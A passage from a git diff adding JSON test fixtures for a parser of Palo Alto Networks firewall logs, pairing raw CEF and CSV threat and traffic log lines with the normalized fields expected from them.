PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStarttime=Jan 01 1970 00:00:00 PanOSTunnel=N/A PanOSThreatCategory=unknown PanOSContentVersion=50059 PanOSSigFlags=0x0 PanOSRuleUUID=017e4d76-2003-47f4-8afc-1d35c808c615 PanOSHTTP2Connection=0 PanOSDynamicUserGroupName= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory=X-Phone PanOSSourceDeviceProfile=x-profile PanOSSourceDeviceModel=Note 4G PanOSSourceDeviceVendor=Lenovo PanOSSourceDeviceOSFamily=K6 PanOSSourceDeviceOSVersion=Android v9 PanOSSourceDeviceHost=pan-505 PanOSSourceDeviceMac=596703749274 PanOSDestinationDeviceCategory=X-Phone PanOSDestinationDeviceProfile=x-profile PanOSDestinationDeviceModel=MI PanOSDestinationDeviceVendor=Xiaomi PanOSDestinationDeviceOSFamily=A1 PanOSDestinationDeviceOSVersion=Android 
v9.1 PanOSDestinationDeviceHost=pan-622 PanOSDestinationDeviceMac=620797415366 PanOSContainerID=1873cc5c-0d31 PanOSContainerNameSpace=pns_default PanOSSourceEDL= PanOSDestinationEDL= PanOSHostID=xxxxxxxxxxxxxx PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSDomainEDL= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSPartialHash=0 PanOSTimeGeneratedHighResolution=Mar 01 2021 20:48:16 PanOSNSSAINetworkSliceType=dc" + }, + "expected": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|THREAT|spyware|1|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 20:48:21 deviceExternalId=xxxxxxxxxxxxx start=Mar 01 2021 20:48:16 PanOSApplicationCategory=general-internet PanOSApplicationContainer=sina-weibo PanOSApplicationRisk=4 PanOSApplicationSubcategory=social-networking PanOSApplicationTechnology=browser-based PanOSCaptivePortal=false PanOSCloudHostname=xxxxx PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDestinationDeviceClass= PanOSDestinationDeviceOS= dntdom=paloaltonetwork duser=xxxxx duid= PanOSHTTPMethod=get PanOSInboundInterfaceDetailsPort=0 PanOSInboundInterfaceDetailsSlot=0 PanOSInboundInterfaceDetailsType=unknown PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer=true PanOSIsContainer=false PanOSIsDecryptMirror=false PanOSIsDecrypted=false PanOSIsDuplicateLog=false PanOSIsEncrypted=false PanOSIsIPV6=false PanOSIsMptcpOn=false PanOSIsNonStandardDestinationPort=false PanOSIsPacketCapture=false PanOSIsPhishing=false PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy=false PanOSIsReconExcluded=false PanOSIsSaaSApplication=false PanOSIsServertoClient=false PanOSIsSourceXForwarded=true PanOSIsSystemReturn=true PanOSIsTransaction=false PanOSIsTunnelInspected=false PanOSIsURLDenied=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT=false PanOSNonStandardDestinationPort=13884 PanOSOutboundInterfaceDetailsPort=0 PanOSOutboundInterfaceDetailsSlot=0 
PanOSOutboundInterfaceDetailsType=unknown PanOSOutboundInterfaceDetailsUnit=0 PanOSPacket= PanOSPayloadProtocolID=-1 PanOSSanctionedStateOfApp=false PanOSSeverity=Informational PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom=paloaltonetwork suser=xxxxx suid= cat=27379 PanOSThreatNameFirewall=27379 PanOSTunneledApplication=tunneled-app PanOSURLDomain= PanOSUsers=paloaltonetwork\\\\xxxxx PanOSVerdict= PanOSVirtualSystemID=1 c6a2=fe80:110:8897:efab:9202:b3ff:fe1e:8329 c6a2Label=Source IPv6 Address c6a3=fe80:110:8897:efab:9202:b3ff:fe1e:8329 c6a3Label=Destination IPv6 Address sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=deny-attackers cs1Label=Rule suser0=paloaltonetwork\\\\xxxxx duser0=paloaltonetwork\\\\xxxxx app=sina-weibo-base cs3=vsys1 cs3Label=VirtualLocation cs4=datacenter cs4Label=FromZone cs5=ethernet4Zone-test4 cs5Label=ToZone deviceInboundInterface=unknown deviceOutboundInterface=unknown cs6=rs-logging cs6Label=LogSetting cn1=947181 cn1Label=SessionID cnt=1 spt=13884 dpt=4228 sourceTranslatedPort=30116 destinationTranslatedPort=20966 proto=tcp act=drop-all request=some other fake filename PanOSThreatID=27379(27379) flexString2=server to client flexString2Label=DirectionOfAttack externalId=xxxxxxxxxxxxx PanOSSourceLocation=LY PanOSDestinationLocation=BR fileId=0 PanOSFileHash= PanOSApplianceOrCloud= PanOSURLCounter=0 PanOSFileType= PanOSSenderEmail= PanOSEmailSubject= PanOSRecipientEmail= PanOSReportID=0 PanOSDGHierarchyLevel1=11 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=xxxxx PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStarttime=Jan 01 1970 00:00:00 PanOSTunnel=N/A PanOSThreatCategory=unknown PanOSContentVersion=50059 PanOSSigFlags=0x0 PanOSRuleUUID=017e4d76-2003-47f4-8afc-1d35c808c615 PanOSHTTP2Connection=0 PanOSDynamicUserGroupName= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory=X-Phone 
PanOSSourceDeviceProfile=x-profile PanOSSourceDeviceModel=Note 4G PanOSSourceDeviceVendor=Lenovo PanOSSourceDeviceOSFamily=K6 PanOSSourceDeviceOSVersion=Android v9 PanOSSourceDeviceHost=pan-505 PanOSSourceDeviceMac=596703749274 PanOSDestinationDeviceCategory=X-Phone PanOSDestinationDeviceProfile=x-profile PanOSDestinationDeviceModel=MI PanOSDestinationDeviceVendor=Xiaomi PanOSDestinationDeviceOSFamily=A1 PanOSDestinationDeviceOSVersion=Android v9.1 PanOSDestinationDeviceHost=pan-622 PanOSDestinationDeviceMac=620797415366 PanOSContainerID=1873cc5c-0d31 PanOSContainerNameSpace=pns_default PanOSSourceEDL= PanOSDestinationEDL= PanOSHostID=xxxxxxxxxxxxxx PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSDomainEDL= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSPartialHash=0 PanOSTimeGeneratedHighResolution=Mar 01 2021 20:48:16 PanOSNSSAINetworkSliceType=dc", + "event": { + "action": "drop-all", + "category": [ + "malware" + ], + "dataset": "threat", + "severity": 1, + "start": "2021-03-01T20:48:16Z", + "timezone": "UTC", + "type": [ + "info" + ] + }, + "@timestamp": "2021-03-01T20:48:21Z", + "action": { + "type": "spyware" + }, + "destination": { + "geo": { + "country_iso_code": "BR" + }, + "nat": { + "ip": "1.1.1.1", + "port": 20966 + }, + "port": 4228, + "user": { + "name": "xxxxx" + } + }, + "host": { + "hostname": "xxxxx", + "id": "xxxxxxxxxxxxx", + "mac": "596703749274", + "name": "xxxxx", + "os": { + "family": "K6", + "version": "Android v9" + }, + "type": "X-Phone" + }, + "log": { + "hostname": "xxxxx", + "logger": "threat" + }, + "network": { + "application": "sina-weibo-base", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "alias": "ethernet4Zone-test4" + } + }, + "ingress": { + "interface": { + "alias": "datacenter", + "name": "n" + } + }, + "product": "PAN-OS", + "type": "LF", + "vendor": "Palo Alto Networks", + "version": "2.0" + }, + "paloalto": { + "DirectionOfAttack": "server to client", + 
"PanOSContainerNameSpace": "pns_default", + "PanOSDestinationDeviceCategory": "X-Phone", + "PanOSDestinationDeviceHost": "pan-622", + "PanOSDestinationDeviceMac": "620797415366", + "PanOSDestinationDeviceModel": "MI", + "PanOSDestinationDeviceOSFamily": "A1", + "PanOSDestinationDeviceOSVersion": "Android v9.1", + "PanOSDestinationDeviceProfile": "x-profile", + "PanOSDestinationDeviceVendor": "Xiaomi", + "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", + "PanOSSourceDeviceHost": "pan-505", + "PanOSSourceDeviceModel": "Note 4G", + "PanOSSourceDeviceProfile": "x-profile", + "PanOSSourceDeviceVendor": "Lenovo", + "PanOSSourceLocation": "LY", + "PanOSThreatID": "27379(27379)", + "VirtualLocation": "vsys1", + "endpoint": { + "serial_number": "xxxxxxxxxxxxxx" + }, + "threat": { + "id": "27379(27379)" + } + }, + "related": { + "hosts": [ + "xxxxx" + ], + "ip": [ + "1.1.1.1" + ], + "user": [ + "xxxxx" + ] + }, + "rule": { + "name": "deny-attackers", + "uuid": "017e4d76-2003-47f4-8afc-1d35c808c615" + }, + "source": { + "nat": { + "ip": "1.1.1.1", + "port": 30116 + }, + "port": 13884, + "user": { + "name": "xxxxx" + } + }, + "user": { + "name": "xxxxx" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/threat_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/threat_csv.json new file mode 100644 index 000000000..571880744 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/threat_csv.json 
@@ -0,0 +1,85 @@ +{ + "input": { + "message": "1,2021/08/31 14:00:02,001701000000,THREAT,vulnerability,2049,2021/08/31 14:00:02,10.0.0.2,10.2.0.1,0.0.0.0,0.0.0.0,abcd,,,web-browsing,vsys,env,zone2,a1.1,aec.2,podl,2021/08/31 14:00:02,279429,2,12345,80,0,0,0x2000,tcp,alert,\"EXAMPLE.PDF\",PDF Exploit Evasion Found(34805),any,informational,server-to-client,1320000,0x2000000000000000,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,,0,,,1,,,,,,,,0,0,0,0,0,,FW,,,,,0,,0,,N/A,code-execution,AppThreat-0000-1111,0x0,0,422342342," + }, + "expected": { + "message": "1,2021/08/31 14:00:02,001701000000,THREAT,vulnerability,2049,2021/08/31 14:00:02,10.0.0.2,10.2.0.1,0.0.0.0,0.0.0.0,abcd,,,web-browsing,vsys,env,zone2,a1.1,aec.2,podl,2021/08/31 14:00:02,279429,2,12345,80,0,0,0x2000,tcp,alert,\"EXAMPLE.PDF\",PDF Exploit Evasion Found(34805),any,informational,server-to-client,1320000,0x2000000000000000,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,,0,,,1,,,,,,,,0,0,0,0,0,,FW,,,,,0,,0,,N/A,code-execution,AppThreat-0000-1111,0x0,0,422342342,", + "event": { + "action": "alert", + "category": [ + "vulnerability" + ], + "code": "34805", + "dataset": "threat", + "outcome": "success", + "reason": "PDF Exploit Evasion Found", + "type": [ + "info" + ] + }, + "@timestamp": "2021-08-31T14:00:02Z", + "action": { + "name": "alert", + "outcome": "success", + "type": "vulnerability" + }, + "destination": { + "address": "10.2.0.1", + "ip": "10.2.0.1", + "nat": { + "ip": "0.0.0.0", + "port": 0 + }, + "port": 80 + }, + "file": { + "name": "EXAMPLE.PDF", + "path": "EXAMPLE.PDF" + }, + "log": { + "hostname": "FW", + "level": "informational", + "logger": "threat" + }, + "network": { + "application": "web-browsing", + "transport": "tcp" + }, + "observer": { + "name": "FW", + "product": "PAN-OS", + "serial_number": "001701000000" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "vulnerability", 
+ "VirtualLocation": "vsys", + "threat": { + "id": "34805", + "name": "PDF Exploit Evasion Found" + } + }, + "related": { + "ip": [ + "0.0.0.0", + "10.0.0.2", + "10.2.0.1" + ] + }, + "rule": { + "name": "abcd" + }, + "source": { + "address": "10.0.0.2", + "ip": "10.0.0.2", + "nat": { + "ip": "0.0.0.0", + "port": 0 + }, + "port": 12345 + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/traffic1_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/traffic1_csv.json new file mode 100644 index 000000000..4fd068d08 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/traffic1_csv.json 
@@ -0,0 +1,108 @@ +{ + "input": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|TRAFFIC|end|3|dtz=UTC rt=Jul 31 2022 12:46:24 deviceExternalId=000000000000 PanOSConfigVersion=10.1 start=Jul 31 2022 12:46:07 src=1.2.3.4 dst=5.6.7.8 sourceTranslatedAddress=4.3.2.1 destinationTranslatedAddress=8.7.6.5 cs1=SO Access cs1Label=Rule suser= duser= app=outlook-web-online cs3=vsys1 cs3Label=VirtualLocation cs4=Trust cs4Label=FromZone cs5=Untrust cs5Label=ToZone deviceInboundInterface=ethernet1/10 deviceOutboundInterface=ethernet1/11 cs6=Panorama_LOF cs6Label=LogSetting cn1=595456 cn1Label=SessionID cnt=1 spt=52066 dpt=443 sourceTranslatedPort=47252 destinationTranslatedPort=443 proto=tcp act=allow PanOSBytes=12503 out=5651 in=6852 cn2=24 cn2Label=PacketsTotal PanOSSessionStartTime=Jul 31 2022 12:43:06 cn3=178 cn3Label=SessionDuration cs2=computer-and-internet-info cs2Label=URLCategory externalId=1111111111111111111 PanOSSourceLocation=10.0.0.0-10.255.255.255 PanOSDestinationLocation=UK PanOSPacketsSent=13 PanOSPacketsReceived=11 reason=tcp-fin PanOSDGHierarchyLevel1=997 PanOSDGHierarchyLevel2=738 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=LF-5698-NR cat=from-policy PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStarttime=Jan 01 1970 00:00:00 PanOSTunnel=N/A PanOSEndpointAssociationID=0 PanOSChunksTotal=0 PanOSChunksSent=0 PanOSChunksReceived=0 PanOSRuleUUID=2e259acc-c7ce-43d0-857f-f1a457e02699 PanOSHTTP2Connection=0 PanOSLinkChangeCount=0 PanOSSDWANPolicyName= PanOSLinkSwitches= PanOSSDWANCluster= PanOSSDWANDeviceType= PanOSSDWANClusterType= PanOSSDWANSite= PanOSDynamicUserGroupName= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceHost= PanOSSourceDeviceMac= PanOSDestinationDeviceCategory= PanOSDestinationDeviceProfile= 
PanOSDestinationDeviceModel= PanOSDestinationDeviceVendor= PanOSDestinationDeviceOSFamily= PanOSDestinationDeviceOSVersion= PanOSDestinationDeviceHost= PanOSDestinationDeviceMac= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSGPHostID= PanOSEndpointSerialNumber= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSHASessionOwner= PanOSTimeGeneratedHighResolution=Jul 31 2022 12:46:07 PanOSNSSAINetworkSliceType= PanOSNSSAINetworkSliceDifferentiator=\n" + }, + "expected": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|TRAFFIC|end|3|dtz=UTC rt=Jul 31 2022 12:46:24 deviceExternalId=000000000000 PanOSConfigVersion=10.1 start=Jul 31 2022 12:46:07 src=1.2.3.4 dst=5.6.7.8 sourceTranslatedAddress=4.3.2.1 destinationTranslatedAddress=8.7.6.5 cs1=SO Access cs1Label=Rule suser= duser= app=outlook-web-online cs3=vsys1 cs3Label=VirtualLocation cs4=Trust cs4Label=FromZone cs5=Untrust cs5Label=ToZone deviceInboundInterface=ethernet1/10 deviceOutboundInterface=ethernet1/11 cs6=Panorama_LOF cs6Label=LogSetting cn1=595456 cn1Label=SessionID cnt=1 spt=52066 dpt=443 sourceTranslatedPort=47252 destinationTranslatedPort=443 proto=tcp act=allow PanOSBytes=12503 out=5651 in=6852 cn2=24 cn2Label=PacketsTotal PanOSSessionStartTime=Jul 31 2022 12:43:06 cn3=178 cn3Label=SessionDuration cs2=computer-and-internet-info cs2Label=URLCategory externalId=1111111111111111111 PanOSSourceLocation=10.0.0.0-10.255.255.255 PanOSDestinationLocation=UK PanOSPacketsSent=13 PanOSPacketsReceived=11 reason=tcp-fin PanOSDGHierarchyLevel1=997 PanOSDGHierarchyLevel2=738 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=LF-5698-NR cat=from-policy PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStarttime=Jan 01 1970 00:00:00 PanOSTunnel=N/A PanOSEndpointAssociationID=0 PanOSChunksTotal=0 PanOSChunksSent=0 PanOSChunksReceived=0 
PanOSRuleUUID=2e259acc-c7ce-43d0-857f-f1a457e02699 PanOSHTTP2Connection=0 PanOSLinkChangeCount=0 PanOSSDWANPolicyName= PanOSLinkSwitches= PanOSSDWANCluster= PanOSSDWANDeviceType= PanOSSDWANClusterType= PanOSSDWANSite= PanOSDynamicUserGroupName= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceHost= PanOSSourceDeviceMac= PanOSDestinationDeviceCategory= PanOSDestinationDeviceProfile= PanOSDestinationDeviceModel= PanOSDestinationDeviceVendor= PanOSDestinationDeviceOSFamily= PanOSDestinationDeviceOSVersion= PanOSDestinationDeviceHost= PanOSDestinationDeviceMac= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSGPHostID= PanOSEndpointSerialNumber= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSHASessionOwner= PanOSTimeGeneratedHighResolution=Jul 31 2022 12:46:07 PanOSNSSAINetworkSliceType= PanOSNSSAINetworkSliceDifferentiator=\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "traffic", + "duration": 178, + "reason": "tcp-fin", + "severity": 3, + "start": "2022-07-31T12:46:07Z", + "timezone": "UTC", + "type": [ + "allowed" + ] + }, + "@timestamp": "2022-07-31T12:46:24Z", + "action": { + "type": "end" + }, + "destination": { + "address": "5.6.7.8", + "bytes": 5651, + "geo": { + "country_iso_code": "UK" + }, + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "packets": 11, + "port": 443 + }, + "host": { + "hostname": "LF-5698-NR", + "id": "000000000000", + "name": "LF-5698-NR" + }, + "log": { + "hostname": "LF-5698-NR", + "logger": "traffic" + }, + "network": { + "application": "outlook-web-online", + "bytes": 12503, + "packets": 24, + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "alias": "Untrust", + "id": "11", + "name": "ethernet1/11" + } + }, + "ingress": { + 
"interface": { + "alias": "Trust", + "id": "11", + "name": "0" + } + }, + "product": "PAN-OS", + "type": "LF", + "vendor": "Palo Alto Networks", + "version": "2.0" + }, + "paloalto": { + "PanOSSessionStartTime": "Jul 31 2022 12:43:06", + "PanOSSourceLocation": "10.0.0.0-10.255.255.255", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" + }, + "related": { + "hosts": [ + "LF-5698-NR" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ] + }, + "rule": { + "name": "SO Access", + "uuid": "2e259acc-c7ce-43d0-857f-f1a457e02699" + }, + "source": { + "address": "1.2.3.4", + "bytes": 6852, + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 47252 + }, + "packets": 13, + "port": 52066 + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/traffic2_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/traffic2_csv.json new file mode 100644 index 000000000..a892a2a7b --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/traffic2_csv.json 
@@ -0,0 +1,112 @@ +{ + "input": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|TRAFFIC|end|3|dtz=UTC rt=Aug 02 2022 06:42:20 deviceExternalId=no-serial PanOSConfigVersion=10.0 start=Aug 02 2022 06:42:01 src= dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=Global_Outbound_internet_access cs1Label=Rule suser=user.name@corp.com duser= app=ssl cs3=vsys1 cs3Label=VirtualLocation cs4=trust cs4Label=FromZone cs5=untrust cs5Label=ToZone deviceInboundInterface=tunnel.1 deviceOutboundInterface=ethernet1/1 cs6=default cs6Label=LogSetting cn1=689028 cn1Label=SessionID cnt=1 spt=63516 dpt=443 sourceTranslatedPort=43823 destinationTranslatedPort=443 proto=tcp act=allow PanOSBytes=13443 out=2755 in=10688 cn2=32 cn2Label=PacketsTotal PanOSSessionStartTime=Aug 02 2022 06:41:44 cn3=0 cn3Label=SessionDuration cs2=low-risk cs2Label=URLCategory externalId=1112030318 PanOSSourceLocation=10.0.0.0-10.255.255.255 PanOSDestinationLocation=EU PanOSPacketsSent=13 PanOSPacketsReceived=19 reason=tcp-fin PanOSDGHierarchyLevel1=463 PanOSDGHierarchyLevel2=467 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=GP cloud service cat=from-policy PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStarttime=Jan 01 1970 00:00:00 PanOSTunnel=N/A PanOSEndpointAssociationID=0 PanOSChunksTotal=0 PanOSChunksSent=0 PanOSChunksReceived=0 PanOSRuleUUID=c38e111b-43fc-4de4-a17c-c372af557193 PanOSHTTP2Connection=0 PanOSLinkChangeCount=0 PanOSSDWANPolicyName= PanOSLinkSwitches= PanOSSDWANCluster= PanOSSDWANDeviceType= PanOSSDWANClusterType= PanOSSDWANSite= PanOSDynamicUserGroupName= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceHost= PanOSSourceDeviceMac= PanOSDestinationDeviceCategory= PanOSDestinationDeviceProfile= PanOSDestinationDeviceModel= 
PanOSDestinationDeviceVendor= PanOSDestinationDeviceOSFamily= PanOSDestinationDeviceOSVersion= PanOSDestinationDeviceHost= PanOSDestinationDeviceMac= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSGPHostID= PanOSEndpointSerialNumber= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSHASessionOwner= PanOSTimeGeneratedHighResolution=Aug 02 2022 06:42:02 PanOSNSSAINetworkSliceType= PanOSNSSAINetworkSliceDifferentiator=" + }, + "expected": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|TRAFFIC|end|3|dtz=UTC rt=Aug 02 2022 06:42:20 deviceExternalId=no-serial PanOSConfigVersion=10.0 start=Aug 02 2022 06:42:01 src= dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=Global_Outbound_internet_access cs1Label=Rule suser=user.name@corp.com duser= app=ssl cs3=vsys1 cs3Label=VirtualLocation cs4=trust cs4Label=FromZone cs5=untrust cs5Label=ToZone deviceInboundInterface=tunnel.1 deviceOutboundInterface=ethernet1/1 cs6=default cs6Label=LogSetting cn1=689028 cn1Label=SessionID cnt=1 spt=63516 dpt=443 sourceTranslatedPort=43823 destinationTranslatedPort=443 proto=tcp act=allow PanOSBytes=13443 out=2755 in=10688 cn2=32 cn2Label=PacketsTotal PanOSSessionStartTime=Aug 02 2022 06:41:44 cn3=0 cn3Label=SessionDuration cs2=low-risk cs2Label=URLCategory externalId=1112030318 PanOSSourceLocation=10.0.0.0-10.255.255.255 PanOSDestinationLocation=EU PanOSPacketsSent=13 PanOSPacketsReceived=19 reason=tcp-fin PanOSDGHierarchyLevel1=463 PanOSDGHierarchyLevel2=467 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=GP cloud service cat=from-policy PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStarttime=Jan 01 1970 00:00:00 PanOSTunnel=N/A PanOSEndpointAssociationID=0 PanOSChunksTotal=0 PanOSChunksSent=0 PanOSChunksReceived=0 PanOSRuleUUID=c38e111b-43fc-4de4-a17c-c372af557193 PanOSHTTP2Connection=0 
PanOSLinkChangeCount=0 PanOSSDWANPolicyName= PanOSLinkSwitches= PanOSSDWANCluster= PanOSSDWANDeviceType= PanOSSDWANClusterType= PanOSSDWANSite= PanOSDynamicUserGroupName= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceHost= PanOSSourceDeviceMac= PanOSDestinationDeviceCategory= PanOSDestinationDeviceProfile= PanOSDestinationDeviceModel= PanOSDestinationDeviceVendor= PanOSDestinationDeviceOSFamily= PanOSDestinationDeviceOSVersion= PanOSDestinationDeviceHost= PanOSDestinationDeviceMac= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSGPHostID= PanOSEndpointSerialNumber= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSHASessionOwner= PanOSTimeGeneratedHighResolution=Aug 02 2022 06:42:02 PanOSNSSAINetworkSliceType= PanOSNSSAINetworkSliceDifferentiator=", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "traffic", + "duration": 0, + "reason": "tcp-fin", + "severity": 3, + "start": "2022-08-02T06:42:01Z", + "timezone": "UTC", + "type": [ + "allowed" + ] + }, + "@timestamp": "2022-08-02T06:42:20Z", + "action": { + "type": "end" + }, + "destination": { + "address": "1.1.1.1", + "bytes": 2755, + "geo": { + "country_iso_code": "EU" + }, + "ip": "1.1.1.1", + "nat": { + "ip": "1.1.1.1", + "port": 443 + }, + "packets": 19, + "port": 443 + }, + "host": { + "hostname": "GP cloud service", + "id": "no-serial", + "name": "GP cloud service" + }, + "log": { + "hostname": "GP cloud service", + "logger": "traffic" + }, + "network": { + "application": "ssl", + "bytes": 13443, + "packets": 32, + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "alias": "untrust", + "id": "1", + "name": "ethernet1/1" + } + }, + "ingress": { + "interface": { + "alias": "trust", + "id": "1", + "name": "1" + } + }, + 
"product": "PAN-OS", + "type": "LF", + "vendor": "Palo Alto Networks", + "version": "2.0" + }, + "paloalto": { + "PanOSSessionStartTime": "Aug 02 2022 06:41:44", + "PanOSSourceLocation": "10.0.0.0-10.255.255.255", + "URLCategory": "low-risk", + "VirtualLocation": "vsys1" + }, + "related": { + "hosts": [ + "GP cloud service" + ], + "ip": [ + "1.1.1.1" + ], + "user": [ + "user.name@corp.com" + ] + }, + "rule": { + "name": "Global_Outbound_internet_access", + "uuid": "c38e111b-43fc-4de4-a17c-c372af557193" + }, + "source": { + "bytes": 10688, + "nat": { + "ip": "1.1.1.1", + "port": 43823 + }, + "packets": 13, + "port": 63516, + "user": { + "name": "user.name@corp.com" + } + }, + "user": { + "name": "user.name@corp.com" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/traffic_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/traffic_cef.json new file mode 100644 index 000000000..58c77fa30 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/traffic_cef.json 
@@ -0,0 +1,142 @@ +{ + "input": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|TRAFFIC|end|3|ProfileToken=xxxxx dtz=UTC rt=Feb 27 2021 20:16:21 deviceExternalId=xxxxxxxxxxxxx PanOSApplicationContainer= PanOSApplicationRisk=5 PanOSApplicationSubcategory=file-sharing PanOSApplicationTechnology=peer-to-peer PanOSCaptivePortal=false PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDestinationDeviceClass= PanOSDestinationDeviceOS= dntdom=paloaltonetwork duser=xxxxx duid= PanOSInboundInterfaceDetailsPort=0 PanOSInboundInterfaceDetailsSlot=0 PanOSInboundInterfaceDetailsType=unknown PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer=false PanOSIsContainer=false PanOSIsDecryptMirror=false PanOSIsDecrypted=false PanOSIsDecryptedLog=false PanOSIsDecryptedPayloadForward=false PanOSIsDuplicateLog=false PanOSIsEncrypted=false PanOSIsIPV6=false PanOSIsInspectionBeforeSession=true PanOSIsMptcpOn=false PanOSIsNonStandardDestinationPort=false PanOSIsPacketCapture=false PanOSIsPhishing=false PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy=false PanOSIsReconExcluded=false PanOSIsSaaSApplication=false PanOSIsServertoClient=false PanOSIsSourceXForwarded=false PanOSIsSystemReturn=false PanOSIsTransaction=false PanOSIsTunnelInspected=false PanOSIsURLDenied=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT=false PanOSNonStandardDestinationPort=0 PanOSOutboundInterfaceDetailsPort=0 PanOSOutboundInterfaceDetailsSlot=0 PanOSOutboundInterfaceDetailsType=unknown PanOSOutboundInterfaceDetailsUnit=0 PanOSSDWANFECRatio=0.0 